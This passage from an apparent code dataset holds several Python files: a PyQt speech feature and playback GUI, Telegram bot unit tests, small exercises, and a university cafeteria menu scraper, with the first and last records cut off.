
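# getLines above probes every pixel with getpixel; the same column-wise scan
# for dark vertical runs vectorizes with numpy. A sketch assuming an
# (H, W, 3) uint8 frame and the MAXRGBFORBLACK threshold used earlier
# (helper name is mine):
import numpy as np

def dark_runs(arr, thresh=40):
    dark = (arr < thresh).all(axis=2)           # (H, W) mask: all channels dark
    runs = []
    for x in range(dark.shape[1]):              # scan one column per x, as above
        ys = np.flatnonzero(dark[:, x])
        if ys.size:
            # split the sorted y indices into contiguous segments
            for seg in np.split(ys, np.flatnonzero(np.diff(ys) > 1) + 1):
                runs.append(((x, int(seg[0])), (x, int(seg[-1]))))
    return runs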
event[\"args_split\"][0]\n\n username = None\n instance = None\n if account:\n username, instance = ap_utils.split_username(account)\n\n if not username or not instance:\n raise utils.EventError(\"Please provide @@\")\n\n actor_url = ap_utils.find_actor(username, instance)\n\n if not actor_url:\n raise utils.EventError(\"Failed to find user\")\n\n actor = ap_actor.Actor(actor_url)\n if not actor.load():\n raise utils.EventError(\"Failed to find user\")\n\n items = actor.outbox.load()\n for item in items:\n if item[\"object\"].get(\"inReplyTo\", None) == None:\n first_item = item\n break\n\n if not first_item:\n raise utils.EventError(\"No toots found\")\n\n cw, out, url = ap_utils.format_note(actor, first_item)\n shorturl = self.exports.get_one(\"shorturl\")(event[\"server\"], url,\n context=event[\"target\"])\n\n if cw:\n out = \"CW: %s - %s\" % (cw, shorturl)\n else:\n out = \"%s - %s\" % (out, shorturl)\n event[\"stdout\"].write(out)\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/fediverse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"39383591415","text":"from collections import defaultdict\nimport json\n\n\nwith open('food_services.json ', 'r', encoding='utf-8') as f:\n d = defaultdict(lambda : ('', 0))\n for rest in json.load(f):\n seats_count = int(rest['SeatsCount'])\n if seats_count > d[rest['TypeObject']][1]:\n d[rest['TypeObject']] = (rest['Name'], seats_count)\nfor k, v in sorted(d.items(), key=lambda x: x[0]):\n print(f'{k}: {v[0]}, {v[1]}')\n \n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_4/Module_4_4/Module_4_4_16.py","file_name":"Module_4_4_16.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36932207871","text":"import sys\nfrom PyQt5 import QtCore, QtGui\nimport PyQt5.QtWidgets as QWidgets\nimport copy\nfrom PyQt5.QtWidgets import QApplication\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport PyQt5.QtMultimedia as Qmedia\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom classfication import thresholdFun as thd\nfrom wavfeature import wavfeature as wf\nimport until\nmatplotlib.use(\"Qt5Agg\")\n\n\nclass MyMainWindow(QWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n # 主窗口初始化\n self.setWindowTitle(\"Qt test\")\n self.setWindowIcon(QtGui.QIcon(\"source/voicesearch_128px_526004_easyicon.net.ico\"))\n # 主窗口部件初始化\n # 状态栏初始化\n self.status = self.statusBar()\n self.setStatusBar(self.status)\n self.file_dict = {} # 语音特征对象Feature\n self.middle_data = {} # 存储中间计算出来的特征以及结果\n self.current_file = None # 当前选中语音文件的文件名\n self.class_feature_data = dict() # 分类方法使用的语音特征字典\n self.current_data = None # 当前选中的绘图使用的数据,通常是一个字典\n # menu初始化\n self.menu_bar = self.menuBar()\n self.menu1_file = QWidgets.QMenu(\"文件\")\n self.menu2_data = QWidgets.QMenu(\"数据\")\n self.menu3_tools = QWidgets.QMenu(\"工具\")\n self.data_action = QWidgets.QAction(\"特征数据\", self.menu2_data)\n self.open_file = QWidgets.QAction(\"打开文件\", self.menu1_file)\n self.add_noise = QWidgets.QAction(\"加噪\", self.menu3_tools)\n self.data_action.setShortcut(\"Ctrl+D\")\n self.open_file.setShortcut(\"Ctrl+O\")\n self.data_action.triggered.connect(self.show_feature_list)\n self.open_file.triggered.connect(self.get_file)\n self.add_noise.triggered.connect(self.add_noises)\n 
self.menu2_data.addAction(self.data_action)\n self.menu1_file.addAction(self.open_file)\n self.menu3_tools.addAction(self.add_noise)\n\n self.menu_bar.addMenu(self.menu1_file)\n self.menu_bar.addMenu(self.menu2_data)\n self.menu_bar.addMenu(self.menu3_tools)\n self.middle_data_dock = QWidgets.QDockWidget(\"MiddleData\", self)\n self.middle_data_listwidget = QWidgets.QListWidget()\n self.right_click_menu = QWidgets.QMenu(self.middle_data_listwidget)\n self.middle_data_listwidget.itemDoubleClicked.connect(self.get_current_data)\n self.clear_mid_data = QWidgets.QPushButton\n self.middle_data_dock.setWidget(self.middle_data_listwidget)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.middle_data_dock)\n self.init_dock()\n # 主窗口载入\n self.main_window = MyWindow()\n self.main_window.list_file.clicked.connect(self.get_item)\n self.main_window.list_file.doubleClicked.connect(self.get_voice_data)\n self.setCentralWidget(self.main_window)\n # main_window逻辑\n self.main_window.plot_button.clicked.connect(self.__plot)\n self.main_window.features_combobox.activated.connect(self.choose_features_fun)\n self.main_window.classfication_combobox.activated.connect(self.choose_classfun)\n self.main_window.clear_button.clicked.connect(self.clear_plot)\n # player model\n self.player = Qmedia.QMediaPlayer()\n self.recoder = Qmedia.QAudioRecorder()\n self.current_playlist = Qmedia.QMediaPlaylist()\n self.init_player_recoder()\n self.status_player = -1 # 1-播放 2-暂停 0-停止\n self.status_recoder = -1 # 1-录音 2-暂停 0-停止\n self.main_window.play_button.clicked.connect(self.play_voice)\n self.main_window.stop_button.clicked.connect(self.stop_play)\n self.main_window.pause_button.clicked.connect(self.pause_play)\n self.main_window.recoder_button.clicked.connect(self.recoder_voice)\n\n def add_noises(self):\n voice_path, ok_press = QWidgets.QFileDialog.getOpenFileName(self, \"ChooseVoice\", '.\\\\', '*.wav')\n if ok_press:\n voice = voice_path\n else:\n return 0\n noise_path, ok_press = QWidgets.QFileDialog.getOpenFileName(self, \"Choose\", '.\\\\', '*.wav')\n if ok_press:\n noise = noise_path\n else:\n return 0\n snr_value, ok_press = QWidgets.QInputDialog.getInt(self, \"Input SNR\", \"SNR:\", 0, -10, 20, 1)\n if ok_press:\n snr = snr_value\n else:\n return 0\n until.add_noise(voice, noise, snr)\n\n def closeEvent(self, a0: QtGui.QCloseEvent):\n reply = QWidgets.QMessageBox.question(self, 'Message', 'Pres Yes to Close.',\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n\n if reply == QWidgets.QMessageBox.Yes:\n app.quit()\n else:\n try:\n a0.ignore()\n except AttributeError:\n pass\n\n def init_player_recoder(self):\n self.player.setVolume(60)\n self.player.stateChanged.connect(self.my_state_change)\n self.player.mediaStatusChanged.connect(self.my_statues_change)\n self.recoder.audioSettings().setCodec('audio/x-wav')\n self.recoder.audioSettings().setChannelCount(1)\n self.recoder.defaultAudioInput()\n self.current_playlist.setPlaybackMode(Qmedia.QMediaPlaylist.CurrentItemOnce)\n\n def my_statues_change(self):\n # 当输出设备更换时得处理方式\n if self.player.mediaStatus() == Qmedia.QMediaPlayer.LoadedMedia and self.status_player == 1:\n self.player.play()\n\n def my_state_change(self):\n if self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n self.player.stop()\n\n def get_file(self):\n file_dialog = QWidgets.QFileDialog()\n f, _ = file_dialog.getOpenFileNames(self, \"OpenFiles\", \".\\\\\", \"*.wav\")\n for file in f:\n file_name = file.split('/')[-1]\n if file_name not in 
set(self.file_dict.keys()):\n self.file_dict[file_name] = wf.Feature(file)\n self.main_window.list_file.addItem(file_name)\n else:\n QWidgets.QMessageBox.information(self, \"Warring\", \"文件\"+file_name+\"已读取\",\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n\n def get_item(self):\n # set current_file ,please note that current_file is a item object\n self.current_file = self.main_window.list_file.currentItem().text()\n self.status.showMessage(\"当前文件:\"+self.current_file, 5000)\n\n def get_voice_data(self):\n if self.current_file is None:\n self.current_file = self.main_window.list_file.currentItem().text()\n self.status.showMessage(\"当前文件:\" + self.current_file, 5000)\n current_item = self.file_dict[self.current_file]\n self.current_data = current_item.data\n\n def get_current_data(self):\n data_name = self.middle_data_listwidget.currentItem().text()\n self.current_data = self.middle_data[data_name]\n\n def __plot(self):\n subplot = self.main_window.subplot_lineEdit.text()\n hold_on = self.main_window.is_holdOn.isChecked()\n y = self.current_data['y']\n if len(subplot) == 0:\n subplot = \"111\"\n if len(subplot) != 3:\n QWidgets.QMessageBox.warning(self, '参数错误', 'subplot参数错误')\n return 0\n ax = self.main_window.figure.add_subplot(subplot)\n #ax.set_xlim(min(self.current_data['x']), )\n if len(self.current_data) > 1:\n x = self.current_data['x']\n if hold_on is False:\n plt.cla()\n ax.plot(x, y)\n else:\n ax.plot(x, y)\n else:\n ax.plot(y)\n self.main_window.canvas.draw()\n\n def clear_plot(self):\n self.main_window.figure.clear()\n self.main_window.canvas.draw()\n\n def init_dock(self):\n self.middle_data_dock.setAllowedAreas(QtCore.Qt.RightDockWidgetArea)\n self.middle_data_dock.setFeatures(QWidgets.QDockWidget.AllDockWidgetFeatures)\n add_item_to_class = self.right_click_menu.addAction(\"添加特征\")\n del_item_from_class = self.right_click_menu.addAction(\"删除特征\")\n del_middle_data = self.right_click_menu.addAction(\"删除数据\")\n add_item_to_class.triggered.connect(self.add_to_class_feature)\n del_item_from_class.triggered.connect(self.del_from_class_feature)\n del_middle_data.triggered.connect(self.del_current_middle_data)\n self.middle_data_listwidget.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.middle_data_listwidget.customContextMenuRequested.connect(self.show_dock_context_menu)\n\n def show_dock_context_menu(self):\n self.right_click_menu.move(QtGui.QCursor.pos())\n self.right_click_menu.show()\n\n def add_to_class_feature(self):\n name = self.middle_data_listwidget.currentItem().text()\n self.class_feature_data[name] = copy.deepcopy(self.middle_data[name])\n text = self.main_window.threshold_lineedit.text() + name + \" \"\n self.main_window.threshold_lineedit.setText(text)\n pass\n\n def del_from_class_feature(self):\n name = self.middle_data_listwidget.currentItem().text()\n try:\n self.class_feature_data.pop(name)\n text = self.main_window.threshold_lineedit.text().replace(name+\" \", \"\")\n self.main_window.threshold_lineedit.setText(text)\n except IndexError:\n pass\n pass\n\n def del_current_middle_data(self):\n name = self.middle_data_listwidget.currentItem().text()\n row = self.middle_data_listwidget.currentRow()\n try:\n self.middle_data.pop(name)\n self.middle_data_listwidget.takeItem(row)\n except IndexError:\n QWidgets.QMessageBox.warning(self, '删除错误', 'MiddleDate中没有该值')\n\n def show_feature_list(self):\n state = self.middle_data_dock.isVisible()\n if state:\n self.middle_data_dock.close()\n else:\n 
self.middle_data_dock.show()\n\n    def choose_features_fun(self):\n        # todo: run the selected feature-extraction routine and cache the result in middle_data\n        # todo: refresh the dock list items and make the dock list visible\n        feature = self.main_window.features_combobox.currentText()\n        if feature == \"ST_energy\":\n            name = self.current_file+\"stenergy\"\n            current_obj = self.file_dict[self.current_file]\n            st_energy = current_obj.st_en()\n            self.middle_data[name] = st_energy\n            self.middle_data_listwidget.addItem(name)\n            self.status.showMessage(\"短时能量提取\", 2000)\n        elif feature == \"ST_ZeroCross\":\n            name = self.current_file + \"stzcr\"\n            st_zcr = self.file_dict[self.current_file].st_zcr()\n            self.middle_data[name] = st_zcr\n            self.middle_data_listwidget.addItem(name)\n            self.status.showMessage(\"短时过零率提取\", 2000)\n\n    def choose_classfun(self):\n        # todo: dispatch to the method matching the selected classification function\n        # todo: return\n        if self.class_feature_data == {}:\n            QWidgets.QMessageBox.information(self, \"Warning\", \"没有选择分类特征\",\n                                             QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n                                             QWidgets.QMessageBox.Yes)\n            return 0\n        elif len(self.class_feature_data) > 2:\n            QWidgets.QMessageBox.information(self, \"Warning\", \"特征数不符合该方法\",\n                                             QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n                                             QWidgets.QMessageBox.Yes)\n            return 0\n\n        if self.main_window.classfication_combobox.currentText() == \"Threshold\":\n            th1, _ = QWidgets.QInputDialog.getDouble(self.main_window, \"输入TH1的值\", \"TH1\", value=1.2)\n            th2, _ = QWidgets.QInputDialog.getDouble(self.main_window, \"输入TH2的值\", \"TH2\", value=1.6)\n            speech_mark = thd.threshold(self.class_feature_data, threshold_val1=th1, threshold_val2=th2)\n            self.middle_data_listwidget.addItem(\"speech_mark_threshold\")\n            self.middle_data[\"speech_mark_threshold\"] = speech_mark\n\n    def play_voice(self):\n        self.status_player = 1\n        if self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n            if self.player.mediaStatus() == Qmedia.QMediaPlayer.NoMedia:\n                try:\n                    self.current_playlist.clear()\n                    self.current_playlist.addMedia(Qmedia.QMediaContent(QtCore.QUrl.fromLocalFile(\n                        self.file_dict[self.current_file].filename)))\n                    self.player.setPlaylist(self.current_playlist)\n                except KeyError:\n                    QWidgets.QMessageBox.warning(self, \"No Voice File Chosen\",\n                                                 \"Please Choose a Voice File\\n(double click file item)\")\n                    return 0\n\n            elif self.player.mediaStatus() == Qmedia.QMediaPlayer.LoadedMedia:\n                self.player.play()\n                self.statusBar().showMessage(\"音频文件\"+self.current_file+\"播放中...\", 2000)\n            elif self.player.mediaStatus() == Qmedia.QMediaPlayer.BufferedMedia:\n                self.player.play()\n                self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n        elif self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n            self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n        elif self.player.state() == Qmedia.QMediaPlayer.PausedState:\n            self.player.play()\n            self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n\n    def stop_play(self):\n        self.status_player = 0\n        if self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n            self.player.stop()\n            self.statusBar().showMessage(\"播放停止\", 2000)\n        elif self.player.state() == Qmedia.QMediaPlayer.PausedState:\n            self.player.stop()\n            self.statusBar().showMessage(\"播放停止\", 2000)\n        elif self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n            self.statusBar().showMessage(\"播放停止\", 2000)\n        # ----------------------------------------------------------------\n        if self.status_recoder == 1 or self.status_recoder == 2:\n            
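# a recording session is still open: ask where to save it before stopping\n            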
\".\\\\recoder.wav\", \"Audio(*.wav)\")\n if save_url[0] != QtCore.QUrl(''):\n self.recoder.setOutputLocation(save_url[0])\n self.status_recoder = 0\n if self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.recoder.stop()\n self.statusBar().showMessage(\"录音停止,录音文件:\"+save_url[1]+\"已保存\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.PausedState:\n self.recoder.stop()\n self.statusBar().showMessage(\"录音停止,录音文件:\"+save_url[1]+\"已保存\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.StoppedState:\n pass\n\n def pause_play(self):\n self.status_player = 2\n if self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n self.player.pause()\n self.statusBar().showMessage(\"播放暂停\", 2000)\n # ------------------------------------------------------------------\n if self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.status_recoder = 2\n self.recoder.pause()\n self.statusBar().showMessage(\"录音暂停!\", 2000)\n\n def recoder_voice(self):\n self.status_recoder = 1\n if self.recoder.state() == Qmedia.QAudioRecorder.StoppedState:\n self.recoder.record()\n self.statusBar().showMessage(\"录音中...\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.PausedState:\n self.recoder.record()\n self.statusBar().showMessage(\"恢复录音\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.statusBar().showMessage(\"录音中...\", 2000)\n pass\n\n\nclass MyWindow(QWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n self.main_window_layout = QWidgets.QVBoxLayout()\n # topLayout 布局\n self.top_layout = QWidgets.QHBoxLayout()\n\n self.left_top_layout = QWidgets.QVBoxLayout()\n self.plot_button = QWidgets.QPushButton(\"绘图\")\n self.clear_button = QWidgets.QPushButton(\"清除\")\n self.data_lineEdit = QWidgets.QLineEdit()\n self.subplot_lineEdit = QWidgets.QLineEdit()\n self.is_holdOn = QWidgets.QCheckBox()\n self.play_button = QWidgets.QPushButton(\"播放\")\n self.pause_button = QWidgets.QPushButton(\"暂停\")\n self.stop_button = QWidgets.QPushButton(\"停止\")\n self.recoder_button = QWidgets.QPushButton(\"录制\")\n\n self.right_top_layout = QWidgets.QVBoxLayout()\n self.features_combobox = QWidgets.QComboBox()\n self.classfication_combobox = QWidgets.QComboBox()\n self.threshold_lineedit = QWidgets.QLineEdit()\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.list_file = QWidgets.QListWidget()\n self.init_top_layout()\n\n # bottom_layout 布局\n self.bottom_layout = QWidgets.QHBoxLayout()\n self.init_bottom_layout()\n\n # 主窗口布局\n self.main_window_layout.addLayout(self.top_layout, stretch=2)\n self.main_window_layout.addLayout(self.bottom_layout, stretch=1)\n self.setLayout(self.main_window_layout)\n\n def init_top_layout(self):\n # left_top_layout\n plot_buttons = QWidgets.QHBoxLayout()\n plot_buttons.addWidget(self.plot_button)\n plot_buttons.addWidget(self.clear_button)\n\n plot_choice_layout = QWidgets.QFormLayout()\n self.subplot_lineEdit.setPlaceholderText(\"整形\")\n subplot_validator = QtGui.QIntValidator(self)\n subplot_validator.setRange(111, 999)\n self.subplot_lineEdit.setValidator(subplot_validator)\n plot_choice_layout.addRow(QWidgets.QLabel(\"数据:\"), self.data_lineEdit)\n plot_choice_layout.addRow(QWidgets.QLabel(\"SubPlot:\"), self.subplot_lineEdit)\n plot_choice_layout.addRow(QWidgets.QLabel(\"Hold\"), self.is_holdOn)\n\n play_layout = QWidgets.QHBoxLayout()\n play_layout.addWidget(self.play_button)\n play_layout.addWidget(self.pause_button)\n play_layout.addWidget(self.stop_button)\n 
play_layout.addWidget(self.recoder_button)\n\n self.left_top_layout.addLayout(plot_buttons)\n self.left_top_layout.addLayout(plot_choice_layout)\n self.left_top_layout.addWidget(self.list_file)\n self.left_top_layout.addLayout(play_layout)\n # right_top_layout\n test_button = QWidgets.QPushButton(\"Test\")\n features_layout = QWidgets.QFormLayout()\n self.features_combobox.addItem(\"ST_energy\")\n self.features_combobox.addItem(\"ST_ZeroCross\")\n features_layout.addRow(QWidgets.QLabel(\"Features:\"), self.features_combobox)\n classification_layout = QWidgets.QFormLayout()\n self.classfication_combobox.addItem(\"Threshold\")\n classification_layout.addRow(QWidgets.QLabel(\"ClassMethod:\"), self.classfication_combobox)\n self.right_top_layout.addWidget(QWidgets.QLabel(\"分类使用的特征⬇\"))\n self.right_top_layout.addWidget(self.threshold_lineedit)\n\n self.right_top_layout.addLayout(features_layout)\n self.right_top_layout.addLayout(classification_layout)\n self.right_top_layout.addWidget(test_button)\n self.right_top_layout.addStretch()\n\n self.top_layout.addLayout(self.left_top_layout, stretch=1)\n self.top_layout.addStretch()\n self.top_layout.addWidget(self.canvas, stretch=3)\n self.top_layout.addStretch()\n self.top_layout.addLayout(self.right_top_layout, stretch=1)\n\n def init_bottom_layout(self):\n button = QWidgets.QPushButton(\"Test\")\n self.bottom_layout.addWidget(button)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = MyMainWindow()\n form.show()\n sys.exit(app.exec_())\n\n","repo_name":"xiaochencen/qt-vad","sub_path":"main_ui.py","file_name":"main_ui.py","file_ext":"py","file_size_in_byte":20857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6162538122","text":"from unittest.mock import AsyncMock, MagicMock, Mock\n\nimport pytest\nfrom aiogram.types import AllowedUpdates, ChatMemberStatus\n\nfrom src.bots.tg import TelegramBot\n\n\n@pytest.fixture\ndef dispatcher():\n dispatcher = MagicMock()\n\n dispatcher.start_polling = AsyncMock()\n dispatcher.bot.close = AsyncMock()\n return dispatcher\n\n\n@pytest.fixture\ndef chats_repo():\n chats_repo_mock = MagicMock()\n return chats_repo_mock\n\n\n@pytest.mark.asyncio\nasync def test_tg_start(dispatcher: Mock, chats_repo: Mock):\n relax_time = 10\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo, relax=relax_time)\n await bot.check_updates()\n\n dispatcher.register_my_chat_member_handler.assert_called_once_with(\n bot.chat_member_handler\n )\n dispatcher.register_message_handler.assert_called_once_with(\n bot.start_message_handler, commands=\"start\"\n )\n dispatcher.start_polling.assert_called_once_with(\n allowed_updates=AllowedUpdates.MESSAGE + AllowedUpdates.MY_CHAT_MEMBER,\n relax=relax_time,\n )\n dispatcher.bot.close.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_tg_chat_member_handler_added_to_chat(dispatcher, chats_repo):\n chat_id = 5\n chat_ids_str = \"5\"\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n chat_member_statuses = [\n ChatMemberStatus.MEMBER,\n ChatMemberStatus.ADMINISTRATOR,\n ChatMemberStatus.CREATOR,\n ChatMemberStatus.RESTRICTED,\n ]\n\n for status in chat_member_statuses:\n chats_repo.add_chat = AsyncMock()\n chats_repo.remove_chat = AsyncMock()\n\n event = MagicMock()\n event.new_chat_member.status = status\n event.chat.id = chat_id\n await bot.chat_member_handler(event)\n chats_repo.add_chat.assert_called_once_with(chat_ids_str)\n 
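# membership-gaining statuses must only ever add the chat, never remove it\n        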
chats_repo.remove_chat.assert_not_called()\n\n\n@pytest.mark.asyncio\nasync def test_tg_chat_member_handler_left_chat(dispatcher: Mock, chats_repo: Mock):\n    chat_id = 5\n    chat_ids_str = \"5\"\n\n    bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n    left_statuses = [\n        ChatMemberStatus.LEFT,\n        ChatMemberStatus.KICKED,\n    ]\n\n    for status in left_statuses:\n        chats_repo.add_chat = AsyncMock()\n        chats_repo.remove_chat = AsyncMock()\n\n        event = MagicMock()\n        event.new_chat_member.status = status\n        event.chat.id = chat_id\n        await bot.chat_member_handler(event)\n        chats_repo.remove_chat.assert_called_once_with(chat_ids_str)\n        chats_repo.add_chat.assert_not_called()\n\n\n@pytest.mark.asyncio\nasync def test_tg_start_message_handler_first_message(\n    dispatcher: Mock, chats_repo: Mock\n):\n    chat_id = 5\n    chat_ids_str = \"5\"\n\n    chats_repo.is_chat_id_subscribed = AsyncMock(return_value=False)\n    chats_repo.add_chat = AsyncMock()\n\n    message = MagicMock()\n    message.chat.id = chat_id\n    message.answer = AsyncMock()\n\n    bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n    await bot.start_message_handler(message)\n    chats_repo.add_chat.assert_called_once_with(chat_ids_str)\n    message.answer.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_tg_start_message_handler_second_message(\n    dispatcher: Mock, chats_repo: Mock\n):\n    chats_repo.is_chat_id_subscribed = AsyncMock(return_value=True)\n    chats_repo.add_chat = AsyncMock()\n\n    message = MagicMock()\n    message.chat.id = 5\n    message.answer = AsyncMock()\n\n    bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n    await bot.start_message_handler(message)\n    chats_repo.add_chat.assert_not_called()\n    message.answer.assert_called_once()\n","repo_name":"vdor/tgn-water-bot","sub_path":"test/test_bots/test_tg.py","file_name":"test_tg.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10373792201","text":"# 9. A merchant bought a product and wants to sell it at a 45% profit if the purchase price is\n# below 20.00; otherwise the profit will be 30%. Read the product price\n# and print the sale price.
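\n#\n# Worked example (hypothetical prices): 10.00 -> profit 4.50 -> sale 14.50;\n# 30.00 -> profit 9.00 -> sale 39.00.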
\n\nvalor_produto = float(input(\"Enter the product price: \"))\nlucro = 0\n\nif valor_produto < 20:\n    lucro = valor_produto * 0.45\nelse:\n    lucro = valor_produto * 0.30\n\nprint(\"Sale price: \", valor_produto + lucro)","repo_name":"mtrs8/listas-python","sub_path":"lista005/exercicio009.py","file_name":"exercicio009.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26532856238","text":"import sys\n\n\ndef read_lines():\n    return [[int(num) for num in line.split('\\t')] for\n            line in sys.stdin.readlines()]\n\n\ndef max_min_checksum(line):\n    return max(line) - min(line)\n\n\ndef divisors_checksum(line):\n    last_i = len(line)\n    for i in range(0, last_i):\n        i_item = line[i]\n        for j in range(0, last_i):\n            j_item = line[j]\n            if i != j and i_item % j_item == 0:\n                return i_item // j_item\n\n\ndef compute_checksum(f):\n    lines = read_lines()\n    checksum_list = [f(line) for line in lines]\n    return sum(checksum_list)\n\n\nprint(compute_checksum(max_min_checksum))\nprint(compute_checksum(divisors_checksum))\n","repo_name":"howsad/aoc2017","sub_path":"src/day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39110370968","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nfrom django.utils import timezone\nfrom meals.models import Meal, Menu, Restaurant\n\ndef crawl():\n    kukje_crawler()\n    student_crawler()\n    hankyung_crawler()\n\ndef dates_handler(dates, restaurant_name):\n    restaurant = Restaurant.objects.get(name=restaurant_name)\n    for date in dates:\n        Menu.objects.get_or_create(date=date, restaurant=restaurant)\n\ndef meal_handler(type, meals, prices, dates, restaurant_name):\n    restaurant = Restaurant.objects.get(name=restaurant_name)\n    for index, meal_names in enumerate(meals):\n        if not meal_names:\n            continue\n        if isinstance(meal_names, list):\n            for meal_name in meal_names:\n                meal, _ = Meal.objects.get_or_create(name=meal_name, type=type, restaurant=restaurant)\n                meal.price = prices[index]\n                meal.save()\n                menu = Menu.objects.get(date=dates[index], restaurant=restaurant)\n                menu.meals.add(meal)\n        else:\n            meal, _ = Meal.objects.get_or_create(name=meal_names, type=type, restaurant=restaurant)\n            meal.price = prices[index]\n            meal.save()\n            menu = Menu.objects.get(date=dates[index], restaurant=restaurant)\n            menu.meals.add(meal)\n\ndef kukje_crawler():\n    page = requests.get('http://coop.yonsei.ac.kr/Menu/Kukje.asp')\n    soup = BeautifulSoup(page.content, 'html.parser')\n    KUKJE_RESTAURANTS = [\"Y-플라자\", \"송도1학사\", \"송도2학사\"]\n    KUKJE_DIVISIONS = [[\"Soban\", \"Western 1\", \"Western 2\", \"Chef's special\", \"Hotbowl 1\", \"Hotbowl 2\", \"Chinese 1\", \"Chinese 2\"], [\"Hot Bowl\", \"Western\", \"HotBowl\", \"Westernl\", \"Snack\"], [\"Korean\", \"International\", \"컵밥\"]]\n    KUKJE_MEAL_TIMES = [\"(아침)\", \"(점심)\", \"(저녁)\"]\n    COLUMN_COUNT = 8\n    division_time_mixed_re = re.compile(\"(.*)(\\\\(아침\\\\)|\\\\(점심\\\\)|\\\\(저녁\\\\))\")\n    chinese2_meal_re = re.compile(\"[-,0-9]{,}00원\")\n    dates = None\n    meals = []\n    prices = []\n    current_meal_time = None\n    current_division = None\n    current_rowspan = 0\n    current_row = 0\n    current_col = 0\n    for index, current_restaurant in enumerate(KUKJE_RESTAURANTS):\n        sub_soup = soup.find(\"tr\", id=\"lay%s\" % (index)).table.table\n        trs = sub_soup.table.find_all(\"tr\") if 
sub_soup.table else sub_soup.find_all(\"tr\")\n for tr in trs:\n if tr.td.attrs.get(\"colspan\") == COLUMN_COUNT.__str__():\n tr.extract()\n continue\n current_rowspan = tr.td.attrs.get(\"rowspan\", 1) if current_row == 0 else current_rowspan\n # Restaurant name and the dates \n if tr.td.font and tr.td.font.attrs.get(\"color\") == \"#CCFF00\":\n dates = [td.font.get_text().replace(\"\\xa0\", \"\") for td in tr.find_all(\"td\")[1:]]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})월\").findall(date)[0].zfill(2)\n day = re.compile(\"([0-9]{0,2})일\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if current_row == 0:\n current_rowspan = int(tr.td.attrs.get(\"rowspan\", 1))\n td = tr.td\n current_division = \"\"\n current_meal_time = \"\"\n for font in [ele.get_text() for ele in td.find_all(\"font\")]:\n if KUKJE_DIVISIONS[index].__contains__(font):\n current_division = font\n elif KUKJE_MEAL_TIMES.__contains__(font):\n current_meal_time = font\n mixed_datum = division_time_mixed_re.findall(font)\n if mixed_datum and mixed_datum[0] and mixed_datum[0][0] and mixed_datum[0][1]:\n current_division = mixed_datum[0][0]\n current_meal_time = mixed_datum[0][1]\n if (current_rowspan == 2 and current_row == 0) or (current_rowspan == 3 and current_row == 1):\n for td in tr.find_all(\"td\"):\n meal = td.font.get_text() if td.font else td.get_text().replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(\"\\xa0\", \"\").strip()\n colspan = int(td.attrs.get(\"colspan\", 1))\n if td.attrs.get(\"rowspan\") == \"2\" and chinese2_meal_re.search(meal):\n price = []\n tokens = chinese2_meal_re.findall(meal)\n price = tokens[0]\n meal_split = meal.split(price)\n meal = \"%s(%s)\" % (meal_split[0].replace('-', '').strip(), meal_split[1].replace('-', ''))\n prices += colspan * [price]\n meals += colspan * [meal]\n if current_rowspan == 2 and current_row == 